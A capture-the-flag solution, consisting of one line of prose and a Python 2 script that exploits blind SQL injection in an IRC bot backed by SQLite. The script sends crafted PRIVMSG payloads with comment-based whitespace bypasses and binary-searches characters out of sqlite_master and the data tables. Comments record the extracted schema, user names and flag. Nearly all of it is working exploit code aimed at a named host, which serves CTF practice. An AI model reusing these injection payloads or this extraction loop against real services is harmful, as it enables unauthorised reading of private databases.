This IRC server has Blind SQL injection vulnerability. The databese is sqlite.
Let's write script.
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket, select
def read_until(f, s, after=0, timeout=1):
f.setblocking(0)
sum = ""
i = 0
while True:
ready = select.select([f,], [], [], timeout)
if ready[0]:
ret = f.recv(1)
sum += ret
if s in sum:
if i == after :
f.setblocking(1)
return sum
else:
i+=1
else:
ret = ""
if not ret:
f.setblocking(1)
return False
def do_sqli(q, m):
global sock
print "send :", hex(m), q[:-1]
sock.send(q)
data = read_until(sock, "\r\n", timeout=30)
spl = data.split('\n')
for s in spl:
if user in s:
p = s+"\n"
print "parse:", p
return p
else:
print spl
print "parse error"
exit()
def do_bsqli():
word = ""
print "[+] '" + word + "'"
pos = len(word) + 1
while True:
#query = "PRIVMSG akictf-q36 :'or(select/**/case/**/when(select/**/substr(group_concat(tbl_name,'/'),%d,1)from/**/sqlite_master/**/where/**/type='table')>'%s'then'a'else'b'end)='a'--++\n"
# -> user/fl4g
#query = "PRIVMSG akictf-q36 :'or(select/**/case/**/when(select/**/substr(group_concat(sql,'/'),%d,1)from/**/sqlite_master/**/where/**/tbl_name='user')>'%s'then'a'else'b'end)='a'--++\n"
# -> CREATE TABLE user ( name VARCHAR(255) NOT NULL PRIMARY KEY, score INT NOT NULL )
#query = "PRIVMSG akictf-q36 :'or(select/**/case/**/when(select/**/substr(group_concat(sql,'/'),%d,1)from/**/sqlite_master/**/where/**/tbl_name='fl4g')>'%s'then'a'else'b'end)='a'--++\n"
# -> CREATE TABLE fl4g ( flag TEXT, fl4g TEXT, realFLAG TEXT )
#query = "PRIVMSG akictf-q36 :'or(select/**/case/**/when(select/**/substr(group_concat(name,'/'),%d,1)from/**/user)>'%s'then'a'else'b'end)='a'--++\n"
# -> 1/a/akiym/flag/fla*g/+flag/()/</script>alert(1)</script>/print("a")/aaaaaaaaaaa+/aaaaaaaaaaa/cat/**/flag/%s/\x00/%20/akictf-q36/a ...
#query = "PRIVMSG akictf-q36 :'or(select/**/case/**/when(select/**/substr(group_concat(flag,'/'),%d,1)from/**/fl4g)>'%s'then'a'else'b'end)='a'--++\n"
# -> http://www.youtube.com/watch?v=oHg5SJYRHA0
#query = "PRIVMSG akictf-q36 :'or(select/**/case/**/when(select/**/substr(group_concat(fl4g,'/'),%d,1)from/**/fl4g)>'%s'then'a'else'b'end)='a'--++\n"
# -> http://www.youtube.com/watch?v=oHg5SJYRHA0
query = "PRIVMSG akictf-q36 :'or(select/**/case/**/when(select/**/substr(group_concat(realFlag,'/'),%d,1)from/**/fl4g)>'%s'then'a'else'b'end)='a'--++\n"
# -> the flag is... I <3 SQLite! # You should be careful Last "!", because this program cannot judge "white space" and "!"
# pre space check
q = query%(pos,chr(0x21))
q = q.replace("'''", '"\'"')
data = do_sqli(q, 0x21)
if data.endswith(': \r\n'):
word += chr(0x20)
print "[+] '"+word+"'"
pos += 1
continue
# binary search
l, r = 0x21, 0x7f
while l != r:
m = (l+r) / 2
q = query%(pos,chr(m))
q = q.replace("'''", '"\'"')
data = do_sqli(q, m)
if not data.endswith(': \r\n'):
l = m + 1
else:
r = m
word += chr(l)
print "[+] '" + word + "'"
pos += 1
host, port = 'card.freenode.net', 6667
user = "test765"
if __name__ == '__main__':
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
print read_until(sock, '...\r\n', timeout=15)[:-2]
sock.send('NICK '+user+'\nUSER '+user+' '+user+' * :'+user+'\n')
print read_until(sock, ':'+user+' MODE '+user+' :+i\r\n', timeout=15)[:-2]
sock.send('JOIN #akictf-meeting\n')
print read_until(sock, ':End of /NAMES list.\r\n', timeout=15)[:-2]
do_bsqli()